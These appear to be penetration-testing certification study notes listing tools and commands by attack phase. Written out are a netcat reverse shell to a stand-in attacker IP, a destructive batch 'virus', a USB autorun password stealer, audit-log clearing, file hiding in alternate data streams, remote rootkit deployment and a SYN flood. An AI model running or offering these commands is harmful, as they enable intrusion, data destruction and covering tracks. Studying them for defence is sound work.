Important Tools by steps Flashcards
Phase 1: Footprinting
Major search engines have an alert system for any updates that occur such as Google
Archive.org (aka The Wayback Machine) allows you to find archived copies of websites form which you can extract information
Netcraft - suite of tools used to obtain web server version, IP address, subnet data, OS info, subdomain info (go to netcraft.com > what’s the site running?)
Link Extractor - this tool locates & extracts the internal and external URLs for a given location
Maltego - a app that illustrates relationship between people, gruops, companies, etc (illustrates the dangers of social networking)
Finance websites - can get company officers, profiles, shares, competitors
Social Media
Job sites
http://whoreadme.com –> allows you to track emails & provides info on OS, browster type, location, etc
Competitive analysis - (establishing what makes your product or service unique; looking at what competitors are doing to see how your target is moving) Tools such as EDGAR (reports), LexisNexis (news), BusinessWire (status), CNBC (future plans)
Google Hacking - Examples of operators include:
1) cache:
2) link:
- —Finding websites that have linked to the page
3) info:
4) site:
5) allintitle:
- –Returns websites w/ specified words in their title
6) allinurl:
7) filetype:
For more: www.exploit-db.com/google-dorks/
NW info - Whois - find domain name, IP info, etc
Tracert - follow the path of traffic from one point to another, find relative performance and latency between hops; find server names, etc
Phase 2: Scanning
Wardialing - dialing into modems (top apps –> ToneLoc, THC-SCAN, NIKSUN’s PhoneSweep
Wardriving - driving around w/ wireless-enabled laptop or device to find access points (top apps –> AirSnort (crack WEPs), AirSnare (alert when unapproved machine connects to ur wireless), Kismet (linux, wireless NW detector, sniffer), NetStumbler (wireless NW detector), inSSIDer (wireless NW detector, mapper of access points)
Pinging - cmd prompt –> ping OR ping OR Nmap.org - used for port scanning –> NMAP -sP -v
Ping sweep - sweeping through range of IPs to find live host….. nMap …
nmap -sP -PE - PA
nmap -sn -PE -PA21,23,80,3389 192.168.10.1-50
Xmas tree in Nmap (sending SYN,ACK,URG,FIN,RST flags to client to see if port is open or closed)–> NMAP -sX -v
FIN scan - only fin packet sent –>
NMAP -sF
Null scan - frame sent with no flags set –>
NMAP -sN
Ack Scan - probe to tell whether or not firewall or router is in use –>
NMAP -sA -P0
**what to do if packet filters, firewalls, or other devices pick up evidence of your attack? FRAGMENT PACKET
NMAP -sS -T4 -A -f -v
other tools»_space; Fragtest, Fragroute (both command line tools)
Port scanning - after finding live hosts, scan for open ports
packet crafting - making custom packets to send & see how target responds (gain info)
–> HPING2 and HPING3 - command-line only creating custom packets for testing
Create an ACK packet & send it to port 80:
Hping3 -A -p 80
Create a SYN scan against different ports:
Hping3 -8 50-56 -s -v
Create packet w/ FIN, URG -p 80
Banner Grabbing - to determine info about services running on a system –> Use Telnet
telnet 80 head/http/1.0
–> Netcraft, Xprobe (linux), p0f (linux)
Countermeasure of banner grabbing - disable or change server info –> IIS Lockdown, ServerMask, etc
hide file extensions to hide technology used to generate pages
tools –> PageXchanger
Vulnerability Scanning –>
Tools –> Nmap, Rapid7, Retina, etc
Setup proxy to hide self –>
1) Find ur IP –> whatismyip.com
2) Search for proxies with IP and port #
3) change proxy settings in browser
4) Find ur IP
Tools –> TOR the onion router used to improve privacy & security for internet; packets cannot be traced; encrypt traffic
Phase 3: Enumeration
1) Extracting info from Email IDs
2) Obtaining info through Default PWs
3) Using Brute-force attacks on Directory Services
4) Exploiting SNMP
5) Working w/ DNS Zone Transfers
6) Capturing User Groups
*Using nbtstat to exploit NetBIOS
*Exploit Null Session
Attach to the system by:
net use \hostnameorIP\ipc$ “ \user:”
View the shares available:
net view \hostnameorIP
Once an attacker has this list of shares, next step is to connect to a share & view the data:
net use s: \hostnameorIP\sharedFolderName
- SuperScan - many functions
- PsTools Suite - ^^^
*SNMP enumeration tools –> SNMPUtil, SolarWinds’ IP NW Browser, SNScan (detects devices on a NW enabled for SNMP)
Enum4linux - allows for extraction of info where Samba is in use
Samba - SW that can be run on a platform to share files
LDAP enumeration tools
- JXplorer
- LDAP Admin Tool
- LDAP Account Mgr
- LEX (The LDAP Explorer)
- Active Directory Explorer
- LDAP Administration Tool
- LDAP search
- Active Directory Domain Services Mgmt Pack
- LDAP Browser/Editor
NTP Enumeration The following commands can be used against an NTP server 1) ntpdate 2) ntptrace 3) ntpdc 4) ntpq
SMTP Enumeration
using telnet & VRFY in cmd:
//use telnet command to attach to the target & extract info; use VRFY command to check if specific user ID is present
telnet
//connected
VRFY username
//response
Using EXPN
telnet 25
//connect
EXPN
Using RCPT TO telnet 25 MAIL FROM: link //response RCPT TO:link //response
Other Tools for SMTP enumeration include: TamoSoft’s Essential NetTools or NetScanTool Pro
Phase 4: System Hacking
Sniffing tool - Wireshark
1) Passive Online Attacks - sitting back & listening (sniffing tools such as Wireshark, man-in-the-middle attacks, replay attacks)
2) Active Online Attacks - deeper engagement w/ targets w/ intent to break PW (i.e. password guessing, trojan/spyware/key loggers, hash injection, phishing)
3) Offline Attacks - preying on the weaknesses of how PWs are stored; (i.e. precomputed hashes, distributed NW attacks, rainbow attacks)
4) Nontechnical Attacks aka non-electronic attacks - moving from offline into the real world (i.e.shoulder surfing, social engineering, dumpster diving)
Offline Attack Extracting hashes from a System 1) open cmd 2) type pwdump7.exe //displays hashes 3) type pwdump7.exe > C;\hash.txt 4) Using notepad, browse to the C drive & open the hash.txt file to view the hashes
Generating Rainbow tables - winrtgen (gui-based generator)
Rainbow Crack: Program used to compare Rainbow table with Hash files
Default Passwords: If an attacker can determine that you have not change the default of a guess equipment or system you may have, they can look up your default PW at the following sites: http://cirt.net default-password.info defaultpassword.us passwordsdatabase.com w3dr.net virus.org open-sez.me securityoverride.org routerpasswords.com fortypoundhead.com
USB Password Theft
embedding a password-stealing application on a USB drive, physically plugging the drive into a target system
USB Password Theft application (steps to steal)
1) Obtain a PW-hacking utility such as pspv.exe
2) Copy it to USB
3) Create a Notepad file called launch.bat containing the following lines:
[autorun]
en = launch.bat
Start pspv.exe /s passwords.txt
4) Save launch.bat to the USB drive
//pspv.exe = protected-storage PW viewer, saves PWs contained in Internet Explorer & other applications
Mitigation: disabling autoplay of USB devices, which is on by default
Apps that may decipher hashes include: Ophcrack, L0phtcrack, pwdump
Privilege Escalation: Change password
Identify an account that has desired access & then change the password using the following tools:
Active@ Password Changer Trinity REscue Kit ERD Commander Windows Recovery Environment (WinRE) Password Resetter
Trinity Rescue Kit (TRK) Linux distribution (for Windows & Linux); Can be booted from CD or flash drive
1) cmd line: winpass -u Administrator
2) Choose file system
3) Set Password
4) Type: init 0, to shut down TRK Linux
5) Reboot
//Planting backdoors or run apps on remote system
- PsTools suite (suite of tools to ease system administration)
- PsExec is one of them; similar to Telnet but does not need installation & can be run local or remotely; Commands include:
psexec \zelda cmd //launches an interative cmdprmpt on a system name \zelda
psexec \zelda ipconfig /all //executes ipconfig on remote system with the /all switch & outputs locally
psexec \zelda -c rootkit.exe //copies the program rootkit.exe to the remote system & executes it interactively
psexec \zelda -u administrator -c rootkit.exe //copies thee program rootkit.exe to the remote system & executes it interactively using the admin acct on the remote system
Running trojans, rootkits, and backdoors is a good idea;
More programs to attach to a remote system:
- PDQ Deploy //helps w/ deploying SW to a single system or multiple
- RemoteExec //Works like PsExec, but makes it easier to restart, reboot, & manipulate folders on the system
- DameWare //remotely administer & control a system, may not be detected by antivirus utilities
//Covering your tracks DISABLING AUDITING - Auditing designed to allow for detection & tracking of selected events on a system; we want to alter the way events are logged on target system;
How to disable running command in Windows:
auditpol \ /clear
Addition tools to surgically remove entries in Windows Security Log:
-Dumpel, Elsave, WinZapper, CCleaner, Wipe, MRU-Blaster, Tracks Erase Pro, Clear My History
How to disable running command in Windows:
auditpol \ /clear
DATA HIDING - hide files placed on the system;
ALTERNATE DATA STREAMS (ADS) (only on NTFS) - major security issue w/ ADS bc it is nearly a perfect mechanism for hiding data; almost impossible to find; The data can lie and wait until the attacker decides to run it later; allows you to hide files within existing files
Creating an ADS:
type triforce.exe > smoke.doc:triforce.exe //executing this command hides triforce.exe behind the file smoke.doc, then delete original triforce.exe
Retrieve the file:
start smoke.doc:triforce.exe //opens hidden file & executes
Tools that can detect those hidden files:
- SFIND //used to find streamed files
- LNS //finding ADS streamed files
- Tripwire //detects changes in files; can detect ADS
MALWARE
CREATING A VIRUS
Do no execute this code bc it could cause a lot of damage
1) Create a batch file called virus.bat using Notepad
2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*
3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com
Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)
SHEEP DIP SYSTEM
used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; The computer is stripped down & includes on those services & apps needed to test the SW
DETECTING TROJANS & VIRUSES
Tools such as nmap, netstat (not real-time), TCPview (real-time, open ports) to detect open ports & listen for connections on the system
cmd: netstat -an //lists all ports & listening for connections
TOOLS FOR CREATING TROJANS
-let me rule, recub, phatbot, amitis, zombam.b, HTTPRat, Beast, Hard-disk killer, back orifice, BO2K
Tip when creating trojans: TCP vs UDP when choosing protocol to run open port for access to system
UDP is typically used to traverse firewall or security architecture
The port used is port 80 bc it is usually open
Using BO2K
used to install server & install that server on victim’s computer to gain access
BO2K executable needs to be ran on target system; the application runs an executable called Umgr32.exe which may be masked as a different process in task manager; if stealth was not configured, the app appears as Remote Administration Service
WRAPPER programs //merges payload with harmless executable: EliteWrap, Saran Wrap, Trojan Man, Teflon Oil Patch, Restorator, Firekiller 2000
Trojan construction kits: Trojan construction kit, Senna Spy, Stealth Tool
TOOLS to Exploit Covert Channels //Allows you to transmit info in unusual ways: Loki, ICMP backdoor, 007Shell, B0CK, Reverse World Wide Web Tunneling Shell, AckCmd
Keylogger Tools: IKS SW keylogger, Ghost Keylogger, Spector Pro, Fakegina,
USING NETCAT *other tools: Datapipe, Fpipe //Cmd utility used to read info from connections using TCP or UDP & do port redirection
1) nc -n -v -l -p 80 //set up the listener on system
2) nc -n HACKERS_IP 80 -e cmd.exe //redirect traffic to Hacker’s system
3) Now hacker has victim’s system
Netcat can also do port scanning & place files on target system
nc -v -z -w1 IP_address - //used to scan ports
List of flags for NetCat:
Page 398
Sniffers
//Captures traffic
Besides sniffers, there are HW protocol analyzers which plug directly into the NW at the HW level & can monitor traffic w/ out manipulating traffic
SNIFFING TOOLS
wireshark one; TCPdump; Windump; Omnipeek; Dsniff; EtherApe; MSN SNiffer; NetWitness NextGen
MAC FLOODING //to allow sniffing of NW, we need to make the switch think it is a hub, so flood CAM table w/ MAC addresses
Tools include: Macof;
OVERFLOWING A CAM TABLE USING UBUNTU
Standard repositories store the tools needed for a successful attack; obtained with APTITUDE
1) su to root
2) aptitude install dsniff //install DSNIFF (include Macof)
3) enter cmd: macof //will start flooding CAM table
4) Ctrl +Z to stop
ARP POISONING //attempts to contaminate NW w/ improper gateway mappings
Tools: Ettercap, Cain & Abel, Arpspoof
Cain and Abel is known for ARP poisoning, password cracking, and sniffing
Good place for tools
www.sectools.org
Performing a SYN Flood
Tool: HPING3 //Linux utility used to craft custom packets such as packets that have specific flags activated
1) Have Wireshark up & running; get sniffer started;
2) In your BackTrack box, open cmd, hping3 for a list of commands
3) hping3 –flood -p 80 -S 192.168.1.2 //Flood SYN packets
4) Check out the traffic
5) Go back to BackTrack & terminate cmd with ctrl+C
Tools for creating Botnets
Shark, Plugbot, Poison Ivy, Low Orbit Ion Cannon (LOIC) (the easiest tool)
DoS and DDoS Tools
DoS Tools: DoSHTTP, UDP Flood, Jolt2, Targa
DDoS Tools: Trinoo, LOIC Low Orbit Ion Cannon (easiest tool), TFN2K, Stacheldraht
Session Hijack
Performing a MiTM Attack //Page 543
Password Cracking
Brutus //Page 576
Tools available to add, check, or list security/vulnerabilities
www.openssl.org
www.owasp.org
nessus.org
WinSSLMiM
stunnel.org
Locating Databases on the NW
SQLPing 3.0 is designed to discover DBs
SQLRecon
After locating a database, SQLPing can be used to crack PWs
Link for pen testing tools
http://vulnerabilityassessment.co.uk/
